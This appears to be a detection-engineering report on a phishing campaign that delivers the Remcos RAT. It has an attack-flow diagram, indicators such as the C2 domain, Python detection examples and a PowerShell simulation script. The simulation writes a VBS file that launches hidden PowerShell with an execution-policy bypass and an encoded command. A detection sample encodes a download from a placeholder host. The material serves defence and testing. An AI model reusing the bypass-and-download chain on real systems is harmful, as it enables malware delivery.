Remcos RAT Delivered Through a Deceptive Purchase Order
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A phishing email themed as a purchase order delivers an archive with a double extension that extracts a malicious VBS loader. That loader launches a hidden PowerShell process, which retrieves a fake PNG file containing an encoded payload. The payload is then deobfuscated, rebuilt as a .NET portable executable, and loaded directly into memory, ultimately deploying the Remcos remote access trojan. The campaign highlights a fileless execution chain built around familiar email-based attack techniques.
Investigation
The analysis followed the entire infection sequence from the original phishing email to the final Remcos RAT deployment. Investigators identified key artifacts including the VBS script name, use of PowerShell environment variables, and the URL used to download the fake PNG file. The reconstructed .NET assembly was loaded in memory, while Remcos-specific registry entries and mutex artifacts helped confirm the final payload. Researchers also captured relevant network indicators, including the command-and-control domain tied to the campaign.
Mitigation
Organizations should strengthen attachment scanning and block archive files that use misleading double extensions. PowerShell execution policies should be enforced, and use of wscript.exe should be tightly restricted where possible. Defenders should also monitor for suspicious registry keys under HKCU\SOFTWARE and track TLS JA3 fingerprints associated with Remcos activity. Email security gateways should be updated regularly to improve detection of phishing lures targeting procurement and finance workflows.
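The double-extension filter recommended above, together with a check for the fake-image carrier described in the summary, as an added example (not the report's or any vendor's own tooling); the decoy-token list, the base64 run length, and the sample files are assumptions constructed for the example.

```python
import base64
import re

# Assumed lists (constructed for this example, not taken from the report).
DECOY_TOKENS = {"pdf", "doc", "docx", "xls", "xlsx", "invoice", "po"}
ARCHIVE_EXTS = ("txz", "zip", "rar", "7z", "iso")
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{200,}={0,2}")  # long base64 runs only

def is_double_extension(filename: str) -> bool:
    """T1036.007: a document-type token sits right before an archive extension."""
    name = filename.lower()
    for ext in ARCHIVE_EXTS:
        if name.endswith("." + ext):
            stem = name[: -(len(ext) + 1)]
            return re.split(r"[._ \-]", stem)[-1] in DECOY_TOKENS
    return False

def is_pe(buf: bytes) -> bool:
    """MZ header plus a 'PE\\0\\0' signature at the e_lfanew offset."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(buf[0x3C:0x40], "little")
    return buf[e_lfanew:e_lfanew + 4] == b"PE\0\0"

def embedded_pe(data: bytes):
    """Return the decoded executable if any base64 run in the file is a PE."""
    for m in B64_RUN.finditer(data):
        try:
            decoded = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if is_pe(decoded):
            return decoded
    return None

def triage_attachment(filename: str, data: bytes) -> list:
    findings = []
    if is_double_extension(filename):
        findings.append("double-extension archive name (T1036.007)")
    if filename.lower().endswith(".png") and not data.startswith(PNG_MAGIC):
        findings.append(".png name without PNG signature")
    if embedded_pe(data) is not None:
        findings.append("base64 run decodes to an MZ/PE executable")
    return findings

# Constructed sample: a minimal MZ/PE stub, base64-wrapped inside a fake "PNG".
SAMPLE_PE = b"MZ" + bytes(0x3A) + (0x40).to_bytes(4, "little") + b"PE\0\0" + bytes(200)
FAKE_PNG = b"not-an-image " + base64.b64encode(SAMPLE_PE) + b"\n"
```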
Response
If this activity is detected, isolate the affected endpoint immediately and terminate suspicious PowerShell or wscript.exe processes. Collect memory dumps and relevant registry artifacts for forensic analysis before cleanup. Remove the Remcos payload and related persistence entries, then reset any credentials that may have been exposed. A broader threat hunt should also be conducted across the environment to identify systems showing similar indicators.
Attack Flow
graph TB
    %% Class definitions
    classDef action fill:#99ccff
    classDef technique fill:#ffcc99
    classDef file fill:#e6e6e6
    classDef process fill:#ffeb99
    classDef malware fill:#ff9999
    classDef tool fill:#cccccc
    classDef config fill:#dddddd
    %% Node definitions
    action_phishing["<b>Action</b> – <b>T1566.001 Spearphishing Attachment</b><br/>Victim receives email with malicious archive named <i>Sarens PO_SB-0407026-001_PDF.txz</i>"]
    class action_phishing action
    technique_masquerade["<b>Technique</b> – <b>T1036.007 Masquerading: Double File Extension</b><br/>Archive uses .txz extension but appears as .pdf to deceive the user"]
    class technique_masquerade technique
    action_user_exec["<b>Action</b> – <b>T1204.002 User Execution</b><br/>Victim opens the archive, causing extraction of a VBS script"]
    class action_user_exec action
    file_vbs["<b>File</b> – <b>VBS Script</b><br/>Name: Sarens PO_SB-0407026-001_PDF.vbs"]
    class file_vbs file
    process_wscript["<b>Process</b> – <b>wscript.exe</b><br/>Executes the VBS script"]
    class process_wscript process
    process_powershell["<b>Process</b> – <b>PowerShell</b><br/>Launches with execution-policy bypass to download remote payload"]
    class process_powershell process
    file_payload_image["<b>File</b> – <b>Fake Image</b><br/>Name: optimized_MSI.png<br/>Contains Base64-encoded .NET PE payload"]
    class file_payload_image file
    technique_proc_inject_tls["<b>Technique</b> – <b>T1055.005 Process Injection: Thread Local Storage</b><br/>PowerShell injects code via TLS"]
    class technique_proc_inject_tls technique
    technique_proc_inject_apc["<b>Technique</b> – <b>T1055.004 Process Injection: Asynchronous Procedure Call</b><br/>PowerShell injects code via APC"]
    class technique_proc_inject_apc technique
    technique_proc_inject_pe["<b>Technique</b> – <b>T1055.002 Process Injection: Portable Executable Injection</b><br/>Reconstructed .NET PE loaded into memory with AppDomain.Load"]
    class technique_proc_inject_pe technique
    malware_remcos["<b>Malware</b> – <b>Remcos RAT</b><br/>Establishes encrypted TLS channel to C2 domain"]
    class malware_remcos malware
    comm_c2_web["<b>Technique</b> – <b>T1102.003 Web Service: One-Way Communication</b><br/>Encrypted TLS connection to <i>dentalux202.ydns.eu</i>"]
    class comm_c2_web technique
    registry_key["<b>Configuration</b> – <b>Registry Key</b><br/>HKCU\SOFTWARE\Rmc-HQO1B7 created by RAT"]
    class registry_key config
    mutex["<b>Configuration</b> – <b>Mutex</b><br/>Remcos mutex identifier Rmc-HQO1B7"]
    class mutex config
    %% Connections
    action_phishing -->|delivers| technique_masquerade
    technique_masquerade -->|leads to| action_user_exec
    action_user_exec -->|extracts| file_vbs
    file_vbs -->|executed by| process_wscript
    process_wscript -->|launches| process_powershell
    process_powershell -->|downloads| file_payload_image
    file_payload_image -->|provides| technique_proc_inject_tls
    file_payload_image -->|provides| technique_proc_inject_apc
    file_payload_image -->|provides| technique_proc_inject_pe
    technique_proc_inject_tls -->|enables| malware_remcos
    technique_proc_inject_apc -->|enables| malware_remcos
    technique_proc_inject_pe -->|enables| malware_remcos
    malware_remcos -->|communicates via| comm_c2_web
    malware_remcos -->|creates| registry_key
    malware_remcos -->|creates| mutex
Detections
- LOLBAS WScript / CScript (via process_creation)
- Call Suspicious .NET Methods from Powershell (via powershell)
- Suspicious Powershell Strings (via powershell)
- Possible Dynamic DNS Service Was Contacted (via dns)
- IOCs (HashSha256) to detect: From a Deceptive Purchase Order to Remcos RAT
- IOCs (SourceIP) to detect: From a Deceptive Purchase Order to Remcos RAT
- IOCs (DestinationIP) to detect: From a Deceptive Purchase Order to Remcos RAT
- Remcos RAT Command-and-Control Domain and Malicious Payload URL Access [Windows Network Connection]
- Detection of VBS Script Execution Followed by PowerShell with ExecutionPolicy Bypass [Windows Process Creation]
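A worked implementation of the last detection listed above (a script host spawning PowerShell with an execution-policy bypass, with the -EncodedCommand argument decoded and inspected), added here as an example and not the platform's own rule; the process-creation events, the hostname payload.invalid and the encoded script are constructed for the example.

```python
import base64
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# powershell.exe accepts unambiguous prefixes of parameter names, so cover them.
EP_BYPASS = re.compile(r"-(?:ep|ex|exe|exec|executionpolicy)\s+bypass", re.I)
ENC_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Strings worth flagging in the decoded script (download, decode, in-memory load).
SUSPICIOUS = ("invoke-webrequest", "downloadstring", "downloadfile", "net.webclient",
              "frombase64string", "appdomain", ".load(", "invoke-expression")

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline: str):
    """-EncodedCommand carries base64 of the UTF-16LE script text."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def evaluate(event: dict):
    """Alert when a script host spawns PowerShell with an execution-policy bypass."""
    if (basename(event["parent_image"]) not in SCRIPT_HOSTS
            or basename(event["image"]) not in POWERSHELL
            or not EP_BYPASS.search(event["cmdline"])):
        return None
    decoded = decode_encoded_command(event["cmdline"]) or ""
    hits = [s for s in SUSPICIOUS if s in decoded.lower()]
    return {"pid": event["pid"], "decoded": decoded, "hits": hits,
            "severity": "high" if hits else "medium"}

def run_detection(events: list) -> list:
    return [a for a in map(evaluate, events) if a]

# Constructed process-creation events (not real telemetry); hostname is a placeholder.
SAMPLE_SCRIPT = r"Invoke-WebRequest -Uri http://payload.invalid/optimized_MSI.png -OutFile $env:TEMP\img.png"
ENC = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
EVENTS = [
    {"pid": 1340, "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -NoLogo -WindowStyle Hidden -EncodedCommand " + ENC},
    {"pid": 1400, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\ops\backup.ps1"},
]
```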
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Attack Narrative & Commands
The adversary sends a phishing email with an attached malicious.vbs. The user double‑clicks the file, invoking wscript.exe. The VBS script then launches PowerShell with -ExecutionPolicy Bypass to download a remote PowerShell payload that installs the Remcos RAT. The exact command line is:
powershell.exe -ExecutionPolicy Bypass -NoLogo -WindowStyle Hidden -EncodedCommand <BASE64_PAYLOAD>
Regression Test Script
#--------------------------------------------------------------------
# Simulation Script: VBS → PowerShell ExecutionPolicy Bypass
#--------------------------------------------------------------------
# 1. Build a small PowerShell payload (e.g., write a marker file).
#    Single quotes keep $env:Temp unexpanded here so the child PowerShell
#    resolves it when it runs the decoded command.
$payload = 'Set-Content -Path "$env:Temp\pwned.txt" -Value "Compromised"'
# -EncodedCommand expects Base64 of the UTF-16LE (Unicode) script text.
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
# 2. Create the malicious VBS file that runs the PowerShell command.
#    The here-string is double-quoted, so $encoded is expanded now.
$vbsContent = @"
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell.exe -ExecutionPolicy Bypass -NoLogo -WindowStyle Hidden -EncodedCommand $encoded", 0, False
"@
$vbsPath = "$env:Temp\malicious.vbs"
Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII
# 3. Execute the VBS script (simulates user double-click). wscript.exe should
#    appear as the parent of powershell.exe in process-creation telemetry.
Start-Process -FilePath "wscript.exe" -ArgumentList "`"$vbsPath`"" -WindowStyle Hidden
# Optional: wait a few seconds for the payload to execute
Start-Sleep -Seconds 5
Write-Host "Simulation complete. Check $env:Temp\pwned.txt for artifact."
#--------------------------------------------------------------------
Cleanup Commands
# Remove artifacts created during the simulation
Remove-Item -Path "$env:Temp\malicious.vbs" -ErrorAction SilentlyContinue
Remove-Item -Path "$env:Temp\pwned.txt" -ErrorAction SilentlyContinue
# Stop any lingering PowerShell processes started by the script (if needed);
# the current session is excluded so the cleanup shell does not terminate itself
Get-Process -Name "powershell" -ErrorAction SilentlyContinue | Where-Object { $_.Id -ne $PID } | Stop-Process -Force